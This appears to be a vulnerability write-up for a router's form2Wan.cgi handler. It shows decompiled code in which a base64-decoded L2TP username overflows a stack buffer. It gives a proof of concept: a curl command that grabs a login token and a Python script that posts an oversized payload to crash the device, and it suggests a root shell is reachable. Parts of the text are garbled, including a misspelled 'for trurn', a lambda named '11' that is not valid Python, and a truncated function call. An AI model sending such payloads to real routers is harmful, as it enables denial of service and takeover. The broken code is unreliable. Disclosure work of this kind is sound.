







The picture above shows the latest firmware for this version

Vulnerability details

```
}

for trurn websRedirect(a1, "d_wan.asp");

case '3':

l2tp_server = websGetVar(a1, "l2tp_server", "");

v36 = websGetVar(a1, "l2tp_serverdns", "");

l2tp_usrname = websGetVar(a1, "l2tp_usrname", "");

l2tp_psword = websGetVar(a1, "l2tp_psword", "");

v39 = websGetVar(a1, "l2tp_mode", &word_4784D8);

v40 = websGetVar(a1, "l2tp_ipaddr", "");

v41 = websGetVar(a1, "l2tp_netmask", "");

v42 = websGetVar(a1, "l2tp_netmask", "");

v42 = websGetVar(a1, "l2tp_gateway", "");

v42 = websGetVar(a1, "distriction");

l2tp_usrname_len = strlen(l2tp_usrname);

websDecode64(v94, l2tp_usrname, l2tp_usrname_len);

l2tp_psword_len = strlen(l2tp_psword);

websDecode64(v95, l2tp_psword, l2tp_psword_len);

printf("l2tp_srv(%s) sdns(%s) user(%s) pass(%s) \r\n", l2tp_server, v36, v94, v95);

printf("mode(%s) ip(%s) nm(%s) gw(%s) \r\n", v39, v40, v41, v42);

nvram_bufset(0, &unk_4759E8, l2tp_server);

if (strlen(v36) < 2 || !strncmp(v36, "0.0.0.0", 7))

{

nvram_bufset(0, "wan_l2tn_use_dns", "");

</pre>
```

Vulnerability occurs in /goform/form2Wan.cgi, When wantype is 3, l2tp_usrname will be decrypted by base64, and the result will be stored in v94, which does not check the size of l2tp_usrname, resulting in stack overflow

Poc

The first thing you need to do is to get the tokenid

```
curl http://192.168.0.1/dir_login.asp | grep tokenid
```

Then run the following poc

```
import requests
import base64
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
11 = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
tokenid = 'xxxx'
url = 'http://192.168.0.1/goform/form2Wan.cgi'
payload = base64.b64encode(b'a' * 10000)
data = {
    'tokenid' : tokenid,
    'wantype' : '3',
    'l2tp_usrname' : payload,
    'l2tp_psword' : payload
}
response = requests.post(url, data=data)
response.encoding="utf-8"
info = response.text
li(url)
print(info)
```

You can see the router crash, and finally you can write an exp to get a root shell